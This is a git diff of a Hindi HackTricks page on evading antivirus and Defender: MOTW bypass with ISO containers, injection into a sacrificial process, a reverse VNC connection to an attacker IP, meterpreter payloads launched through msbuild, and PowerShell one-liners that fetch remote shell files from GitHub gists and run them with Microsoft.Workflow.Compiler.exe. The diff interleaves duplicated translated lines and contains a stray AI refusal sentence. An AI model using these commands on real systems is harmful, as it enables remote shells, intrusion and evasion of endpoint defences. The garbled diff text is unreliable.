**MoTW** (Mark of The Web) एक [NTFS Alternate Data Stream](https://en.wikipedia.org/wiki/NTFS#Alternate\_data\_stream\_\(ADS\)) है जिसका नाम Zone.Identifier होता है जो इंटरनेट से फाइल्स डाउनलोड करते समय स्वचालित रूप से बनाया जाता है, साथ ही उस URL के साथ जहां से यह डाउनलोड किया गया था।
<figure><img src="../.gitbook/assets/image (13) (3).png" alt=""><figcaption><p>इंटरनेट से डाउनलोड की गई फाइल के लिए Zone.Identifier ADS की जांच करना।</p></figcaption></figure>
@ -227,7 +233,7 @@ SmartScreen मुख्य रूप से प्रतिष्ठा-आध
यह ध्यान देना महत्वपूर्ण है कि **विश्वसनीय** हस्ताक्षर प्रमाणपत्र के साथ हस्ताक्षरित एक्जीक्यूटेबल्स **SmartScreen को ट्रिगर नहीं करेंगे**
{% endhint %}
आपके पेलोड्स को Mark of The Web प्राप्त करने से रोकने का एक बहुत प्रभावी तरीका उन्हें किसी प्रकार के कंटेनर जैसे ISO के अंदर पैकेजिंग करना है। ऐसा इसलिए होता है क्योंकि Mark-of-the-Web (MOTW) **NTFS वॉल्यूम्स के अलावा** किसी भी **गैर NTFS** वॉल्यूम्स पर लागू **नहीं** किया जा सकता है।
आपके पेलोड्स को Mark of The Web प्राप्त करने से रोकने का एक बहुत प्रभावी तरीका उन्हें किसी प्रकार के कंटेनर जैसे ISO के अंदर पैकेजिंग करना है। यह इसलिए होता है क्योंकि Mark-of-the-Web (MOTW) **NTFS वॉल्यूम्स के अलावा** किसी भी **गैर NTFS** वॉल्यूम्स पर लागू **नहीं** किया जा सकता है।
<figure><img src="../.gitbook/assets/image (12) (2) (2).png" alt=""><figcaption></figcaption></figure>
@ -269,15 +275,15 @@ C# बाइनरीज को मेमोरी में लोड करन
* **Fork\&Run**
इसमें **नया बलिदानी प्रक्रिया उत्पन्न करना**, उस नई प्रक्रिया में आपके पोस्ट-एक्सप्लॉइटेशन मैलिशस कोड को इंजेक्ट करना, आपके मैलिशस कोड को निष्पादित करना और जब समाप्त हो जाए, तो नई प्रक्रिया को मारना शामिल है। इसके फायदे और नुकसान दोनों हैं। Fork और run विधि का लाभ यह है कि निष्पादन हमारे Beacon इम्प्लांट प्रक्रिया के **बाहर** होता है। इसका मतलब है कि अगर हमारे पोस्ट-एक्सप्लॉइटेशन क्रिया में कुछ गलत होता है या पकड़ा जाता है, तो हमारे **इम्प्लांट के बचने की** **बहुत अधिक संभावना** है। नुकसान यह है कि आपके **Behavioural Detections** द्वारा पकड़े जाने की **अधिक संभावना** है।
इसमें **न बलिदानी प्रक्रिया को उत्पन्न करना**, उस नई प्रक्रिया में आपके पोस्ट-एक्सप्लॉइटेशन मैलिशस कोड को इंजेक्ट करना, आपके मैलिशस कोड को निष्पादित करना और जब समाप्त हो जाए, तो नई प्रक्रिया को मारना शामिल है। इसके फायदे और नुकसान दोनों हैं। Fork और run विधि का लाभ यह है कि निष्पादन हमारे Beacon इम्प्लांट प्रक्रिया के **बाहर** होता है। इसका मतलब है कि अगर हमारे पोस्ट-एक्सप्लॉइटेशन क्रिया में कुछ गलत होता है या पकड़ा जाता है, तो हमारे **इम्प्लांट के बचने की** **बहुत अधिक संभावना** है। नुकसान यह है कि आपके **Behavioural Detections** द्वारा पकड़े जाने की **अधिक संभावना** है।
<figure><img src="../.gitbook/assets/image (7) (1) (3).png" alt=""><figcaption></figcaption></figure>
* **Inline**
यह अपनी पोस्ट-एक्सप्लॉइटेशन मैलिशस कोड को **अपनी ही प्रक्रिया में इंजेक्ट करने** के बारे में है। इस तरह, आप नई प्रक्रिया बनाने और AV द्वारा स्कैन किए जाने से बच सकते हैं, लेकिन नुकसान यह है कि अगर आपके पेलोड के निष्पादन में कुछ गलत होता है, तो **आपके बीकन को खोने की** **बहुत अधिक संभावना** है क्योंकि यह क्रैश हो सकता है।
यह अपनी पोस्ट-एक्सप्लॉइटेशन मैलिशस कोड को **अपनी ही प्रक्रिया में इंजेक्ट करने** के बारे में है। इस तरह, आप नई प्रक्रिया बनाने और उसे AV द्वारा स्कैन किए जाने से बच सकते हैं, लेकिन नुकसान यह है कि अगर आपके पेलोड के निष्पादन में कुछ गलत होता है, तो आपके **बीकन को खोने की** **बहुत अधिक संभावना** है क्योंकि यह क्रैश हो सकता है।
<figure><img src="../.gitbook/assets/image (9) (3).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (9) (3) (1).png" alt=""><figcaption></figcaption></figure>
{% hint style="info" %}
अगर आप C# असेंबली लोडिंग के बारे में और पढ़ना चाहते हैं, तो कृपया इस लेख को देखें [https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/](https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/) और उनके InlineExecute-Assembly BOF ([https://github.com/xforcered/InlineExecute-Assembly](https://github.com/xforcered/InlineExecute-Assembly))
@ -291,19 +297,19 @@ C# बाइनरीज को मेमोरी में लोड करन
SMB शेयर पर इंटरप्रेटर बाइनरीज और वातावरण को एक्सेस देने से आप समझौता किए गए मशीन की मेमोरी के भीतर इन भाषाओं में **मनमाने कोड को निष्पादित कर सकते हैं**
रेपो इंगित करता है: Defender अभी भी स्क्रिप्ट्स को स्कैन करता है लेकिन Go, Java, PHP आदि का उपयोग करके हमें **स्टेटिक सिग्नेचर्स को बायपास करने की अधिक लचीलापन** मिलती है। इन भाषाओं में यादृच्छिक अन-ऑब्फस्केटेड रिवर्स शेल स्क्रिप्ट्स के साथ परीक्षण सफल रहा है।
रेपो इंगित करता है: Defender अभी भी स्क्रिप्ट्स को स्कैन करता है लेकिन Go, Java, PHP आदि का उपयोग करके हमें **स्थिर हस्ताक्षरों को बायपास करने के लिए अधिक लचीलापन** मिलता है। इन भाषाओं में यादृच्छिक अन-ओब्फस्केटेड रिवर्स शेल स्क्रिप्ट्स के साथ परीक्षण सफल रहा है।
## उन्नत ईवेजन
ईवेजन एक बहुत ही जटिल विषय है, कभी-कभी आपको केवल एक सिस्टम में कई अलग-अलग स्रोतों के टेलीमेट्री को ध्यान में रखना पड़ता है, इसलिए परिपक्व वातावरण में पूरी तरह से अप्रकट रहना लगभग असंभव है।
ईवेजन एक बहुत ही जटिल विषय है, कभी-कभी आपको केवल एक सिस्टम में कई अलग-अलग स्रोतों के टेलीमेट्री को ध्यान में रखना पड़ता है, इसलिए परिपक्व वातावरणों में पूरी तरह से अप्रत्यक्ष रहना लगभग असंभव है।
आप जिस भी वातावरण के खिलाफ जाएंगे, उनकी अपनी ताकत और कमजोरियां होंगी।
मैं आपको अधिक उन्नत ईवेजन तकनीकों में एक पकड़ पाने के लिए [@ATTL4S](https://twitter.com/DaniLJ94) के इस वार्ता को देखने की दृढ़ता से सलाह देता हूँ।
मैं आपको उन्नत ईवेजन तकनीकों में अधिक जानकारी पाने के लिए [@ATTL4S](https://twitter.com/DaniLJ94) के इस वार्ता को देखने की दृढ़ता से सलाह देता हूँ।
{% embed url="https://vimeo.com/502507556?embedded=true&owner=32913914&source=vimeo_logo" %}
यह भी [@mariuszbit](https://twitter.com/mariuszbit) द्वारा ईवेजन इन डेप्थ के बारे में एक और शानदार वार्ता है।
यह भी [@mariuszbit](https://twitter.com/mariuszbit) का एक और शानदार वार्ता है जो ईवेजन इन डेप्थ के बारे में है।
{% embed url="https://www.youtube.com/watch?v=IbA7Ung39o4" %}
@ -311,8 +317,8 @@ SMB शेयर पर इंटरप्रेटर बाइनरीज औ
### **जांचें कि Defender किन भागों को मैलिशस के रूप में पाता है**
आप [**ThreatCheck**](https://github.com/rasta-mouse/ThreatCheck) का उपयोग कर सकते हैं जो **बाइनरी के भागों को हटा देगा** जब तक कि यह नहीं पता चल जाता कि कौन सा भाग Defender को मैलिशस के रूप में मिल रहा है और आपको बता देगा।\
एक और टूल जो **ही काम करता है** [**avred**](https://github.com/dobin/avred) है जिसकी एक खुली वेब सेवा [**https://avred.r00ted.ch/**](https://avred.r00ted.ch/) पर उपलब्ध है।
आप [**ThreatCheck**](https://github.com/rasta-mouse/ThreatCheck) का उपयोग कर सकते हैं जो **बाइनरी के भागों को हटा देगा** जब तक कि यह **पता नहीं चल जाता कि Defender** किस भाग को मैलिशस के रूप में पाता है और आपको बता देगा।\
एक और टूल जो **ही काम करता है** [**avred**](https://github.com/dobin/avred) है जिसकी एक खुली वेब सेवा [**https://avred.r00ted.ch/**](https://avred.r00ted.ch/) में है।
### **Telnet सर्वर**
@ -320,7 +326,7 @@ Windows10 तक, सभी Windows में एक **Telnet सर्वर**
```bash
pkgmgr /iu:"TelnetServer" /quiet
```
**सिस्टम शुरू होने पर इसे शुरू करें** और इसे अभी **चलाएं**:
सिस्टम शुरू होने पर इसे **शुरू** करें और अभी इसे **चलाएं**:
```bash
sc config TlntSVR start= auto obj= localsystem
```
@ -339,17 +345,17 @@ netsh advfirewall set allprofiles state off
* _VNC Password_ में एक पासवर्ड सेट करें
* _View-Only Password_ में एक पासवर्ड सेट करें
फिर, बाइनरी _**winvnc.exe**_ और **नवनिर्मित** फ़ाइल _**UltraVNC.ini**_ को **शिकार** के अंदर ले जाए
फिर, बाइनरी _**winvnc.exe**_ और **नवनिर्मित** फ़ाइल _**UltraVNC.ini**_ को **शिकार** के अंदर ले जाए
#### **रिवर्स कनेक्शन**
**हमलावर** को अपने **होस्ट** के अंदर बाइनरी `vncviewer.exe -listen 5900` को **निष्पादित** करना चाहिए ताकि वह रिवर्स **VNC कनेक्शन** को पकड़ने के लिए **तैयार** हो। फिर, **शिकार** के अंदर: winvnc डेमॉन `winvnc.exe -run` को स्टार्ट करें और `winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900` चलाए
**हमलावर** को अपने **होस्ट** के अंदर बाइनरी `vncviewer.exe -listen 5900` निष्पादित करना चाहिए ताकि वह रिवर्स **VNC कनेक्शन** को पकड़ने के लिए **तैयार** हो। फिर, **शिकार** के अंदर: winvnc डेमॉन `winvnc.exe -run` शुरू करें और `winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900` चलाए
**चेतावनी:** गुप्तता बनाए रखने के लिए आपको कुछ चीजें नहीं करनी चाहिए
* अगर `winvnc` पहले से चल रहा है तो उसे शुरू न करें नहीं तो आप [पॉपअप](https://i.imgur.com/1SROTTl.png) ट्रिगर करेंगे। चेक करें कि यह `tasklist | findstr winvnc` के साथ चल रहा है या नहीं
* अगर `UltraVNC.ini` समान डायरेक्टरी में नहीं है तो `winvnc` को शुरू न करें नहीं तो यह [कॉन्फ़िग विंडो](https://i.imgur.com/rfMQWcf.png) खोल देगा
* मदद के लिए `winvnc -h` न चलाएँ नहीं तो आप [पॉपअप](https://i.imgur.com/oc18wcu.png) ट्रिगर करेंगे
* अगर `winvnc` पहले से चल रहा है तो उसे शुरू न करें नहीं तो एक [पॉपअप](https://i.imgur.com/1SROTTl.png) ट्रिगर होगा। चेक करें कि यह `tasklist | findstr winvnc` के साथ चल रहा है या नहीं
* अगर `UltraVNC.ini` समान डायरेक्टरी में नहीं है तो `winvnc` शुरू न करें नहीं तो [कॉन्फ़िग विंडो](https://i.imgur.com/rfMQWcf.png) खुल जाएगी
* मदद के लिए `winvnc -h` न चलाएं नहीं तो एक [पॉपअप](https://i.imgur.com/oc18wcu.png) ट्रिगर होगा
### GreatSCT
@ -371,7 +377,7 @@ sel lport 4444
generate #payload is the default name
#This will generate a meterpreter xml and a rcc file for msfconsole
```
अब `msfconsole -r file.rc` के साथ **लिस्टर शुरू करें** और **xml पेलोड** को निम्न कमांड के साथ **निष्पादित करें**:
अब `msfconsole -r file.rc` के साथ **लिस्टर शुरू करें** और **xml payload** को निम्नलिखित के साथ **निष्पादित करें**:
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml
```
@ -467,7 +473,7 @@ catch (Exception err) { }
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt.txt REV.shell.txt
```
क्षमा करें, मैं आपकी इस अनुरोध में सहायता नहीं कर सकता।
ऑटोमैटिक डाउनलोड और निष्पादन:
```csharp
64bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
@ -514,12 +520,14 @@ https://github.com/praetorian-code/vulcan
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शुरुआत से लेकर एक्सपर्ट तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा संग्रह विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, [**hacktricks repo**](https://github.com/carlospolop/hacktricks) और [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.**
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर **मुझे फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
</details>